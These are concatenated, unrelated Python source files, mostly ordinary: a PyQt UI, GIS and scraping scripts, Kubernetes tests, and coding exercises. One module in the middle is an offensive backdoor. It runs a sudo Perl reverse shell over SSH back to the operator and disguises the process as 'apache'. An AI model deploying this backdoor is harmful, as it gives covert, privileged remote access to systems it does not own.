palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.lblPreview.setPalette(palette)
self.lblPreview.setAutoFillBackground(True)
self.lblPreview.setFrameShape(QtGui.QFrame.Box)
self.lblPreview.setText(_fromUtf8(""))
self.lblPreview.setScaledContents(True)
self.lblPreview.setAlignment(QtCore.Qt.AlignHCenter|QtCore.Qt.AlignTop)
self.lblPreview.setObjectName(_fromUtf8("lblPreview"))
self.gridLayout_2.addWidget(self.lblPreview, 1, 1, 1, 1)
spacerItem4 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout_2.addItem(spacerItem4, 1, 0, 1, 1)
spacerItem5 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_2.addItem(spacerItem5, 0, 1, 1, 1)
spacerItem6 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout_2.addItem(spacerItem6, 1, 2, 1, 1)
spacerItem7 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_2.addItem(spacerItem7, 2, 1, 1, 1)
self.dockSnapshotPreview.setWidget(self.dockWidgetContents_2)
MainWindow.addDockWidget(QtCore.Qt.DockWidgetArea(2), self.dockSnapshotPreview)
self.actionSelect_Database = QtGui.QAction(MainWindow)
self.actionSelect_Database.setObjectName(_fromUtf8("actionSelect_Database"))
self.menu_File.addAction(self.actionSelect_Database)
self.menubar.addAction(self.menu_File.menuAction())
self.label_3.setBuddy(self.cmbCamera)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow", None))
item = self.tblData.verticalHeaderItem(0)
item.setText(_translate("MainWindow", "TestData", None))
item = self.tblData.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "RowID", None))
item = self.tblData.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "TimeStamp", None))
item = self.tblData.horizontalHeaderItem(2)
item.setText(_translate("MainWindow", "UPC", None))
item = self.tblData.horizontalHeaderItem(3)
item.setText(_translate("MainWindow", "Image File", None))
__sortingEnabled = self.tblData.isSortingEnabled()
self.tblData.setSortingEnabled(False)
item = self.tblData.item(0, 0)
item.setText(_translate("MainWindow", "RowID", None))
item = self.tblData.item(0, 1)
item.setText(_translate("MainWindow", "TimeStamp", None))
item = self.tblData.item(0, 2)
item.setText(_translate("MainWindow", "UPC", None))
item = self.tblData.item(0, 3)
item.setText(_translate("MainWindow", "Image File", None))
self.tblData.setSortingEnabled(__sortingEnabled)
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Tab 1", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Tab 2", None))
self.menu_File.setTitle(_translate("MainWindow", "&File", None))
self.dockLivePreview.setWindowTitle(_translate("MainWindow", "Live Preview", None))
self.label_3.setText(_translate("MainWindow", "Camera", None))
self.chkAutoSnapshot.setText(_translate("MainWindow", "AutoSnapshot", None))
self.btnTakePhoto.setText(_translate("MainWindow", "Take &Snapshot", None))
self.dockSnapshotPreview.setWindowTitle(_translate("MainWindow", "Snapshot Preview", None))
self.actionSelect_Database.setText(_translate("MainWindow", "Select Database", None))
|
python
|
import argparse
import datetime
import json
import logging
import os
import subprocess
import tempfile
import arcpy
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
log = logging.getLogger(__name__)
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('config_file', help='path to json config file')
args = parser.parse_args()
return args
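# A hypothetical config file for illustration; the keys are the ones read in
# main() below, the values are made up:
# {
#   "time_period_in_days": 30,
#   "raster_store": "D:/raster_store",
#   "datasets": [
#     {
#       "source_mosaic": "mosaics.gdb/source_mosaic",
#       "derived_mosaic": "mosaics.gdb/derived_mosaic",
#       "referenced_mosaic": "mosaics.gdb/referenced_mosaic",
#       "raster_location": "/vsis3/my-bucket/rasters/",
#       "raster_filter": "*.tif",
#       "overview_location": "/vsis3/my-bucket/overviews/"
#     }
#   ]
# }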
def main(config):
cutoff_date = datetime.datetime.now(tz=datetime.timezone.utc) - datetime.timedelta(days=config['time_period_in_days'])
    crf_name = 'Ovi_' + datetime.datetime.now(tz=datetime.timezone.utc).strftime('%Y%m%dT%H%M%S') + '.crf'
for dataset in config['datasets']:
log.info(f'Updating {dataset["source_mosaic"]}')
arcpy.management.RemoveRastersFromMosaicDataset(in_mosaic_dataset=dataset['source_mosaic'],
where_clause='OBJECTID>=0')
arcpy.management.AddRastersToMosaicDataset(
in_mosaic_dataset=dataset['source_mosaic'],
raster_type='Raster Dataset',
input_path=dataset['raster_location'],
update_cellsize_ranges='NO_CELL_SIZES',
filter=dataset['raster_filter'],
)
arcpy.management.CalculateFields(
in_table=dataset['source_mosaic'],
fields=[
['StartDate', "datetime.datetime.strptime(!Name!.split('_')[2], '%Y%m%dT%H%M%S')"],
['EndDate', "datetime.datetime.strptime(!Name!.split('_')[2], '%Y%m%dT%H%M%S')"],
],
)
date_sel = f"StartDate <= timestamp '{cutoff_date.strftime('%Y-%m-%d %H:%M:%S')}'"
arcpy.management.RemoveRastersFromMosaicDataset(in_mosaic_dataset=dataset['source_mosaic'],
where_clause=date_sel)
arcpy.management.CalculateFields(
in_table=dataset['source_mosaic'],
fields=[
['GroupName', '"_".join(!Name!.split(";")[0].split("_")[:-1])'],
['Tag', '!Name!.split("_")[8]'],
['MinPS', '0'],
['MaxPS', '1610'],
],
)
log.info(f'Creating overview crf file for {dataset["source_mosaic"]}')
s3_crf_key = os.path.join(dataset['overview_location'], crf_name)
with tempfile.TemporaryDirectory(dir=config['raster_store']) as temp_dir:
local_crf = os.path.join(temp_dir, crf_name)
with arcpy.EnvManager(pyramid='PYRAMIDS 3', cellSize=900):
arcpy.management.CopyRaster(in_raster=dataset['source_mosaic'], out_rasterdataset=local_crf)
subprocess.run(['aws', 's3', 'cp', local_crf, s3_crf_key.replace('/vsis3/', 's3://'), '--recursive'])
log.info(f'Adding overview file to {dataset["source_mosaic"]}')
arcpy.management.AddRastersToMosaicDataset(
in_mosaic_dataset=dataset['source_mosaic'],
raster_type='Raster Dataset',
input_path=s3_crf_key,
update_cellsize_ranges='NO_CELL_SIZES',
)
selection = arcpy.management.SelectLayerByAttribute(
in_layer_or_view=dataset['source_mosaic'],
selection_type='NEW_SELECTION',
where_clause="Name LIKE 'Ovi_%'",
)
arcpy.management.CalculateFields(
in_table=selection,
fields=[
['StartDate', cutoff_date.strftime("'%m/%d/%Y %H:%M:%S'")],
['EndDate', 'datetime.datetime.now(tz=datetime.timezone.utc)'],
['MinPS', '1600'],
['MaxPS', '18000'],
['Category', '2'],
['GroupName', "'Mosaic Overview'"],
],
)
log.info(f'Updating {dataset["derived_mosaic"]}')
arcpy.management.RemoveRastersFromMosaicDataset(in_mosaic_dataset=dataset['derived_mosaic'],
where_clause='OBJECTID>=0')
arcpy.management.AddRastersToMosaicDataset(
in_mosaic_dataset=dataset['derived_mosaic'],
raster_type='Table / Raster Catalog',
input_path=dataset['source_mosaic'],
update_cellsize_ranges='NO_CELL_SIZES',
)
selection = arcpy.management.SelectLayerByAttribute(
in_layer_or_view=dataset['derived_mosaic'],
selection_type='NEW_SELECTION',
where_clause="Name NOT LIKE 'Ovi_%'",
)
arcpy.management.CalculateFields(
in_table=selection,
fields=[
['MinPS', '0'],
],
)
log.info(f'Building the boundary file for {dataset["referenced_mosaic"]}')
arcpy.management.BuildBoundary(in_mosaic_dataset=dataset['referenced_mosaic'])
log.info('Finished')
if __name__ == '__main__':
args = get_args()
with open(args.config_file) as f:
config = json.load(f)
main(config)
|
python
|
import requests
from src.models import Company
from bs4 import BeautifulSoup as bs
import time
import asyncio
class Scrap:
def __init__(self):
self.headers={
"Host":"www.nepalstock.com",
"User-Agent":"Mozilla/5.0 (X11; Linux aarch64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept":"ext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded",
"Content-Length":"52",
"Origin":"http://www.nepalstock.com",
"Connection":"keep-alive",
"Referer":"http://www.nepalstock.com/main/floorsheet/index/6547/?contract-no=&stock-symbol=&buyer=&seller=&_limit=20",
"Cookie":"ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e341021389a5ee349aafc57cb210c72f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2289.187.177.75%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A69%3A%22Mozilla%2F5.0+%28X11%3B+Linux+aarch64%3B+rv%3A78.0%29+Gecko%2F20100101+Firefox%2F78.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1630139197%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dceb0ebfc57a2d7699c286acc13699739",
"Upgrade-Insecure-Requests":"1"
}
self.payload={
"contract-no":"",
"stock-symbol":"",
"buyer":"",
"seller":"",
"_limit":"500",
}
async def get_floorsheet(self,url:str,upto:int) -> list :
start=time.time()
companies=[]
if upto<0 or upto>262:
return False
        for pagination in range(upto+1):
            skip=0
            page_url = url + f"{pagination}/"  # build each page URL from the unmodified base URL
            res = requests.post(page_url, headers=self.headers, data=self.payload).content.decode("utf-8")
souped_data=bs(res,'lxml')
floor_sheet_table=souped_data.findAll("table",attrs={"class":"table my-table"})[0]
headers=floor_sheet_table.findAll("tr",{"class":"unique"})[0]
for tds in floor_sheet_table.findAll('tr'):
if skip<2:
skip+=1
continue
else:
try:
json_template={
"contract":None,
"symbool":None,
"buyer broker":None,
"seller broker":None,
"quantity":None,
"rate":None,
"amount":None
}
fsv=tds.findAll("td")
company=Company()
company.contract=fsv[1].getText()
company.symbool=fsv[2].getText()
company.buyer_broker=fsv[3].getText()
company.seller_broker=fsv[4].getText()
company.quantity=fsv[5].getText()
company.rate=fsv[6].getText()
company.amount=fsv[7].getText()
json_template["contract"]=company.contract
json_template["symbool"]=company.symbool
json_template["buyer broker"]=company.buyer_broker
json_template["seller broker"]=company.seller_broker
json_template["quantity"]=company.quantity
json_template["rate"]=company.rate
json_template["amount"]=company.amount
companies.append(json_template)
del json_template
del company
except IndexError:
break
companies.append({"Total time taken":time.time()-start})
return companies
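# Example usage sketch (URL and page count are illustrative); get_floorsheet
# is a coroutine, so it has to be awaited or run via asyncio:
#   import asyncio
#   rows = asyncio.run(Scrap().get_floorsheet("http://www.nepalstock.com/main/floorsheet/index/", 5))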
|
python
|
from common_fixtures import * # NOQA
import jinja2
import os
if_upgrade_testing = pytest.mark.skipif(
os.environ.get("UPGRADE_TESTING") != "true",
reason='UPGRADE_TESTING is not true')
pre_upgrade_namespace = ""
post_upgrade_namespace = ""
pre_port_ext = ""
post_port_ext = ""
@pytest.fixture(scope='session')
def get_env():
global pre_upgrade_namespace
global post_upgrade_namespace
global pre_port_ext
global post_port_ext
pre_upgrade_namespace = os.environ.get("PRE_UPGRADE_NAMESPACE")
post_upgrade_namespace = os.environ.get("POST_UPGRADE_NAMESPACE")
pre_port_ext = os.environ.get("PRE_PORT_EXT")
post_port_ext = os.environ.get("POST_PORT_EXT")
# Execute command in container
def execute_cmd(pod, cmd, namespace):
result = execute_kubectl_cmds(
"exec " + pod + " --namespace=" + namespace + " -- " + cmd)
return result
def render(tpl_path, context):
path, filename = os.path.split(tpl_path)
return jinja2.Environment(
loader=jinja2.FileSystemLoader(path)
).get_template(filename).render(context)
def create_stack(input_config):
namespace = input_config["namespace"]
create_ns(namespace)
# Create pre upgrade resources
get_response = execute_kubectl_cmds("get nodes -o json")
nodes = json.loads(get_response)
node1 = nodes['items'][0]['status']['addresses'][0]['address']
# Render the testing yaml
input_config["external_node"] = node1
fname = os.path.join(K8_SUBDIR, "upgrade_testing.yml.j2")
rendered_tmpl = render(fname, input_config)
    with open(os.path.join(K8_SUBDIR, "upgrade_testing.yml"), "wt") as fout:
        fout.write(rendered_tmpl)
execute_kubectl_cmds(
"create --namespace="+namespace,
file_name="upgrade_testing.yml")
def validate_stack(input_config):
namespace = input_config["namespace"]
lb_port = int("888" + input_config["port_ext"])
external_port = "3000" + input_config["port_ext"]
node_port = int("3100" + input_config["port_ext"])
ingress_port = "8" + input_config["port_ext"]
get_response = execute_kubectl_cmds("get nodes -o json")
nodes = json.loads(get_response)
node1 = nodes['items'][0]['status']['addresses'][0]['address']
# Verify the nginx pod is created
waitfor_pods(selector="app=nginx-pod", namespace=namespace, number=1)
get_response = execute_kubectl_cmds(
"get pod/nginx-pod -o json --namespace="+namespace)
pod = json.loads(get_response)
assert pod['metadata']['name'] == "nginx-pod"
assert pod['kind'] == "Pod"
assert pod['status']['phase'] == "Running"
container = pod['status']['containerStatuses'][0]
assert container['image'] == "husseingalal/nginx-curl"
assert container['restartCount'] == 0
assert container['ready']
assert container['name'] == "nginx"
# Verify RC is created
get_response = execute_kubectl_cmds(
"get rc/nginx -o json --namespace="+namespace)
rc = json.loads(get_response)
assert rc["metadata"]["name"] == "nginx"
assert rc["metadata"]["labels"]["name"] == "nginx"
assert rc["spec"]["replicas"] == 2
assert rc["spec"]["selector"]["name"] == "nginx"
container = rc["spec"]["template"]["spec"]["containers"][0]
assert container["image"] == "sangeetha/testnewhostrouting"
assert container["name"] == "nginx"
    waitfor_pods(
        selector="type=rc", namespace=namespace, number=2)
get_response = execute_kubectl_cmds(
"get pod --selector=type=rc"
" -o json --namespace="+namespace)
pod = json.loads(get_response)
assert len(pod["items"]) == 2
pods_list = []
for pod in pod["items"]:
pods_list.append(pod["metadata"]["name"])
assert pod["metadata"]["labels"]["name"] == "nginx"
assert pod["metadata"]["namespace"] == namespace
container = pod["spec"]["containers"][0]
assert container["image"] == "sangeetha/testnewhostrouting"
assert container["name"] == "nginx"
assert pod["status"]["phase"] == "Running"
# Verify that the Load Balancer service is working
get_response = execute_kubectl_cmds(
"get service nginx-lb -o json --namespace="+namespace)
service = json.loads(get_response)
assert service['metadata']['name'] == "nginx-lb"
assert service['kind'] == "Service"
assert service['spec']['ports'][0]['port'] == lb_port
assert service['spec']['ports'][0]['protocol'] == "TCP"
time.sleep(20)
get_response = execute_kubectl_cmds(
"get service nginx-lb -o json --namespace=" + namespace)
service = json.loads(get_response)
lbip = service['status']['loadBalancer']['ingress'][0]["ip"]
check_round_robin_access_k8s_service(pods_list, lbip, str(lb_port),
path="/name.html")
# Verify that the external service is working
check_round_robin_access_k8s_service(pods_list, node1, str(external_port),
path="/name.html")
# Verify that the Clusterip service is working
get_response = execute_kubectl_cmds(
"get service nginx-clusterip -o json --namespace="+namespace)
service = json.loads(get_response)
assert service['metadata']['name'] == "nginx-clusterip"
assert service['kind'] == "Service"
assert service['spec']['ports'][0]['port'] == 8000
assert service['spec']['ports'][0]['protocol'] == "TCP"
clusterip = service['spec']['clusterIP']
clusterport = service['spec']['ports'][0]['port']
get_response = execute_kubectl_cmds(
"get pod --selector=app=nginx-pod -o json --namespace="+namespace)
pods = json.loads(get_response)
clusterurl = clusterip+":"+str(clusterport)
nginxpod = pods['items'][0]['metadata']['name']
cmd_result = execute_cmd(
nginxpod,
'''curl -s -w "%{http_code}" ''' + clusterurl + " -o /dev/null",
namespace)
cmd_result = cmd_result.rstrip()
assert cmd_result == "200"
# Verify that the nodeport service is working
get_response = execute_kubectl_cmds(
"get service nodeport-nginx -o json --namespace="+namespace)
service = json.loads(get_response)
assert service['metadata']['name'] == "nodeport-nginx"
assert service['kind'] == "Service"
assert service['spec']['ports'][0]['nodePort'] == node_port
assert service['spec']['ports'][0]['port'] == 80
assert service['spec']['ports'][0]['protocol'] == "TCP"
get_response = execute_kubectl_cmds(
"get pod --selector=name=nginx -o json --namespace="+namespace)
pods = json.loads(get_response)
get_response = execute_kubectl_cmds("get nodes -o json")
nodes = json.loads(get_response)
for node in nodes["items"]:
node_ip = node['status']['addresses'][0]['address']
check_round_robin_access_k8s_service(pods_list, node_ip,
str(node_port), path="/name.html")
# Check if the ingress works
ingress_name = "ingress1"
port = ingress_port
# Initial set up
lbips = wait_for_ingress_to_become_active(ingress_name, namespace, 1)
selector1 = "k8s-app=k8test1-service"
pod_new_names = get_pod_names_for_selector(selector1, namespace, scale=1)
check_round_robin_access_lb_ip(pod_new_names, lbips[0], port,
hostheader="foo.bar.com",
path="/service3.html")
check_round_robin_access_lb_ip(["nginx-ingress2"], lbips[0], port,
hostheader="foo.bar.com",
path="/name.html")
def modify_stack(input_config):
namespace = input_config["namespace"]
ingress_port = "8" + input_config["port_ext"]
# Scale the RC
get_response = execute_kubectl_cmds(
"scale rc nginx --replicas=3 --namespace="+namespace)
get_response = execute_kubectl_cmds(
"get rc/nginx -o json --namespace="+namespace)
rc = json.loads(get_response)
assert rc["metadata"]["name"] == "nginx"
assert rc["metadata"]["labels"]["name"] == "nginx"
assert rc["spec"]["replicas"] == 3
assert rc["spec"]["selector"]["name"] == "nginx"
container = rc["spec"]["template"]["spec"]["containers"][0]
assert container["image"] == "sangeetha/testnewhostrouting"
assert container["name"] == "nginx"
waitfor_pods(
selector="type=rc", namespace=namespace, number=3)
get_response = execute_kubectl_cmds(
"get pod --selector=type=rc"
" -o json --namespace="+namespace)
pod = json.loads(get_response)
assert len(pod["items"]) == 3
for pod in pod["items"]:
assert pod["metadata"]["labels"]["name"] == "nginx"
assert pod["metadata"]["namespace"] == namespace
container = pod["spec"]["containers"][0]
assert container["image"] == "sangeetha/testnewhostrouting"
assert container["name"] == "nginx"
assert pod["status"]["phase"] == "Running"
# Check if the ingress works
ingress_name = "ingress1"
port = ingress_port
lbips = wait_for_ingress_to_become_active(ingress_name, namespace, 1)
selector1 = "k8s-app=k8test1-service"
rc_name1 = "k8testrc1"
get_response = execute_kubectl_cmds(
"scale rc "+rc_name1+" --replicas=3 --namespace="+namespace)
waitfor_pods(selector=selector1, namespace=namespace, number=3)
pod_new_names = get_pod_names_for_selector(selector1, namespace, scale=3)
# Check if the ingress works with the new pods
ingress_name = "ingress1"
check_round_robin_access_lb_ip(pod_new_names, lbips[0], port,
hostheader="foo.bar.com",
path="/service3.html")
@if_upgrade_testing
def test_pre_upgrade_validate_stack(kube_hosts, get_env):
input_config = {
"namespace": pre_upgrade_namespace,
"port_ext": pre_port_ext
}
create_stack(input_config)
validate_stack(input_config)
@if_upgrade_testing
def test_post_upgrade_validate_stack(kube_hosts, get_env):
# Validate pre upgrade stack after the upgrade
input_config = {
"namespace": pre_upgrade_namespace,
"port_ext": pre_port_ext
}
validate_stack(input_config)
modify_stack(input_config)
# Create and validate new stack on the upgraded setup
input_config = {
"namespace": post_upgrade_namespace,
"port_ext": post_port_ext
}
create_stack(input_config)
validate_stack(input_config)
|
python
|
from backdoors.backdoor import *
class Perl(Backdoor):
prompt = Fore.RED + "(perl) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Perl module"
self.core = core
self.options = {
"port" : Option("port", 53921, "port to connect to", True),
"name" : Option("name", "apache", "name of the backdoor", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "A script written in perl which listens on the network and redirects its input to bash, and renames its process to look less conspicuous."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S perl -e \"use Socket;\" -e \"socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));\" -e \"connect(SOCK, sockaddr_in(" + str(self.get_value("port")) + ",inet_aton('" + self.core.localIP + "')));\" -e \"open(STDIN, '>&SOCK');\" -e \"open(STDOUT,'>&SOCK');\" -e \"open(STDERR,'>&SOCK');\" -e \"exec({'/bin/sh'} ('" + self.get_value("name") + "', '-i'));\""
def do_exploit(self, args):
self.listen("none", "none")
self.core.curtarget.ssh.exec_command(self.get_command())
print("Perl backdoor on port %s attempted. " % self.get_value("port"))
        for mod in self.modules.values():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
python
|
pow2 = []
for x in range(1, 10):
pow2.append(2 ** x)
print(pow2)
new_pow2 = [2 ** x for x in range(1,10)] # Comprehensions
print(new_pow2)
new_pow3 = [2 ** x for x in range(1,10) if x % 2 == 0] # Comprehensions with IF
print(new_pow3)
power = lambda x: 2 ** x
conditional_values = [1,2,3,4,5]
new_pow4 = [power(x) for x in range(1,10) if x in conditional_values]
print(new_pow4)
new_pow5 = [power(x) for x in range(1,10) if conditional_values.count(x) >= 1]
print(new_pow5)
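# The same syntax extends to dict and set comprehensions, e.g.:
pow2_map = {x: 2 ** x for x in range(1, 10)}  # dict comprehension: exponent -> power
print(pow2_map)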
|
python
|
#!/usr/bin/env python3
"""
A module which implements the MergeSort algorithm.
"""
import sys
def parseInput(input):
"""
Converts an input string of integers into an array of integers.
"""
return [int(num) for num in input.split(',')]
def mergeSort(a):
    """
    Sorts an array of numbers into ascending order.
    """
    if len(a) <= 1:  # an empty or single-element array is already sorted
        return a
    else:
        nArrayMid = len(a) // 2
        a1 = a[0:nArrayMid]
        a2 = a[nArrayMid:len(a)]
        return merge(mergeSort(a1), mergeSort(a2))
def merge(a1, a2):
"""
Merges two arrays of numbers (both of which are expected to be pre-sorted into ascending order),
into a new array, sorted in ascending order.
"""
nTotalLength = len(a1) + len(a2)
aMerged = []
i = 0
j = 0
while len(aMerged) < nTotalLength:
if i == len(a1):
aMerged.append(a2[j])
j = j + 1
elif j == len(a2):
aMerged.append(a1[i])
i = i + 1
elif a1[i] <= a2[j]:
aMerged.append(a1[i])
i = i + 1
else:
aMerged.append(a2[j])
j = j + 1
return aMerged
def main(sInput):
aInput = parseInput(sInput)
    result = mergeSort(aInput)
print(result)
if __name__ == '__main__':
main(sys.argv[1]) # The 0th argument is the module filename
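# Example invocation from a shell (script name is illustrative):
#   $ python mergesort.py 5,3,8,1
#   [1, 3, 5, 8]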
|
python
|
"""
У каждой статьи указаны авторы (их несколько) и темы (их тоже
несколько). Определите самую частую пару автор-тема. Если несколько
пар встретились одинаковое число раз, то выведите обе (каждую на
новой строчке).
Формат ввода
На каждой строчке сначала указаны фамилии авторов через пробел, потом
запятая, потом темы (в одно слово) через пробел.
Например, "Ivanov Petrov, DeepLearning Biology".
Последняя строчка ввода – 0.
Формат вывода
Кортеж из фамилии автора и темы.
Например, ("Petrov", "DeepLearning").
"""
input_file = open('input.txt', encoding='utf8')
surnames_themes = []
for string_line in input_file:
    string_line = string_line.strip()  # strip the trailing newline so the "0" sentinel actually matches
    if string_line == "0":
        break
    string_words = string_line.split(', ')
    surnames = string_words[0].split(' ')
    themes = string_words[1].split(' ')
    for surname in surnames:
        for theme in themes:
            surnames_themes.append(surname + "," + theme)
surnames_themes_freq = {}
for items in surnames_themes:
    surnames_themes_freq[items] = surnames_themes_freq.get(items, 0) + 1
res = {k: v for k, v in surnames_themes_freq.items() if v == max(surnames_themes_freq.values())}
for item in [*res]:
print(tuple(item.split(',')))
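# A more compact counting variant using collections.Counter (a sketch over the
# same surnames_themes list built above):
#   from collections import Counter
#   freq = Counter(surnames_themes)
#   best = max(freq.values())
#   for pair, count in freq.items():
#       if count == best:
#           print(tuple(pair.split(',')))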
|
python
|
# Listing_20-1.py
# Copyright Warren & Carter Sande, 2013
# Released under MIT license http://www.opensource.org/licenses/mit-license.php
# Version $version ----------------------------
# Minimum code for a PyQt program
import sys
from PyQt4 import QtCore, QtGui, uic # Import the Qt libraries we need
form_class = uic.loadUiType("MyFirstGui.ui")[0] # Load the UI we created in Designer
# Class definition for the main window
class MyWindowClass(QtGui.QMainWindow, form_class):
def __init__(self, parent=None):
QtGui.QMainWindow.__init__(self, parent)
self.setupUi(self)
app = QtGui.QApplication(sys.argv)       # PyQt program to show our window
myWindow = MyWindowClass() # Make an instance of the window class
myWindow.show() # Start the program and
app.exec_() # display the GUI window
|
python
|
#!/usr/bin/env python
import rospy
# from sensor_msgs.msg import Temperature
from django_interface.msg import SilviaStatus
from django_interface.srv import SilviaStatusRequest, SilviaStatusRequestResponse
class StatusServer:
"""
Store machine status through subscription to status topic
Respond to service requests for status
Required as Arduino service calls do not work in ROS Melodic
"""
def __init__(self):
self.status_msg = SilviaStatus(mode=0, brew=False)
# Subscribers
self.status_subscriber = rospy.Subscriber("status", SilviaStatus, self.status_callback, queue_size=5)
# Service server
self.status_server = rospy.Service('status_request', SilviaStatusRequest, self.handle_status_request)
def status_callback(self, msg):
self.status_msg = msg
def handle_status_request(self, req):
return SilviaStatusRequestResponse(status=self.status_msg)
if __name__ == '__main__':
rospy.init_node("status_server_node", anonymous=True)
server = StatusServer()
rospy.spin()
|
python
|
# Importing the Kratos Library
import KratosMultiphysics as KM
# CoSimulation imports
import KratosMultiphysics.CoSimulationApplication.factories.solver_wrapper_factory as solver_wrapper_factory
def Create(settings, models, solver_name):
input_file_name = settings["input_file"].GetString()
settings.RemoveValue("input_file")
if not input_file_name.endswith(".json"):
input_file_name += ".json"
with open(input_file_name,'r') as parameter_file:
existing_parameters = KM.Parameters(parameter_file.read())
for key, val in existing_parameters["solver_settings"].items():
settings.AddValue(key, val)
return solver_wrapper_factory.CreateSolverWrapper(settings, models, solver_name)
|
python
|
from flask import render_template, redirect
from flask_login import login_required
from . import home
from .. import db
@home.route('/')
@home.route('/index')
def homepage():
"""
Handles requests to `/` and `/index` routes
It's the landing page, index page, homepage or whatever you like to call it
"""
return render_template("home/index.html", title="Homepage")
@home.route('/dashboard')
@login_required
def dashboard():
"""
Handles requests to `/dashboard` route
It's the first page that's seen after login
"""
return render_template("home/dashboard.html", title='Dashboard')
|
python
|
'''
Blind Curated 75 - Problem 40
=============================
Reverse Bits
------------
Reverse the bits of a given 32-bit unsigned integer.
[→ LeetCode][1]
[1]: https://leetcode.com/problems/reverse-bits/
'''
def solution(n):
'''
Working inwards from both ends, use bitwise logic to swap each pair of bits.
'''
right, left = 0, 31
while right < left:
bit_r = n >> right & 1
bit_l = n >> left & 1
if bit_r:
n |= 1 << left
else:
n &= ~(1 << left)
if bit_l:
n |= 1 << right
else:
n &= ~(1 << right)
right += 1
left -= 1
return n
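# Quick check: reversing the 32-bit representation of 1 moves its only set bit
# to the top position, so solution(1) == 0x80000000 == 2147483648.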
|
python
|
from collections import namedtuple
from collections import defaultdict
import spacy
import warnings
import numpy as np
connection = namedtuple('connection', 'node weight')
Index = namedtuple('Index', 'pid, sid, wid')
nlp = spacy.load('en')
# nlp = spacy.load('en_core_web_lg')
# nlp = spacy.load('en_vectors_web_lg', vocab=nlp.vocab)
